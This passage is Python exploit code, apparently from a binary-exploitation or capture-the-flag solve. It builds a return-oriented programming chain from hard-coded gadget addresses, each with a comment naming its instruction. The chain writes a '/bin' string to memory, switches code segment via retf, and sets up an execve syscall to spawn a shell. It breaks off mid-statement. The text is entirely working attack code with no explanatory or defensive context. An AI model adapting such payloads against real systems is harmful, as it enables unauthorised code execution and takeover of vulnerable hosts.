payload = p64(0x4094bf)
#0x00000000004094bf: pop rax; ret; 
payload += p64(0x42b070)+p64(0x40d56d)
# 0x000000000040d56d: xchg edx, eax; ret; 
payload += p64(0x40764b)
# 0x40764b: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x424762)+p32(0x33)
# 0x0000000000424762: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x4094bf)
# 0x00000000004094bf: pop rax; ret; 
payload += p64(0x42b074)+p64(0x40d56d)
# 0x000000000040d56d: xchg edx, eax; ret; 
payload += p64(0x40764b)
# 0x40764b: pop rax ; retf
payload += p64(0x68662f)+p32(0x424762)+p32(0x33)
# 0x0000000000424762: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x4094bf)
# 0x00000000004094bf: pop rax; ret; 
payload += p64(0x0)+p64(0x40d56d)
# 0x000000000040d56d: xchg edx, eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x42b070)+p64(0x40764b)
# 0x40764b: pop rax ; retf
payload += p64(0x3b)+p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4097eb)
# 0x00000000004097eb: syscall; ret; 
payload +=
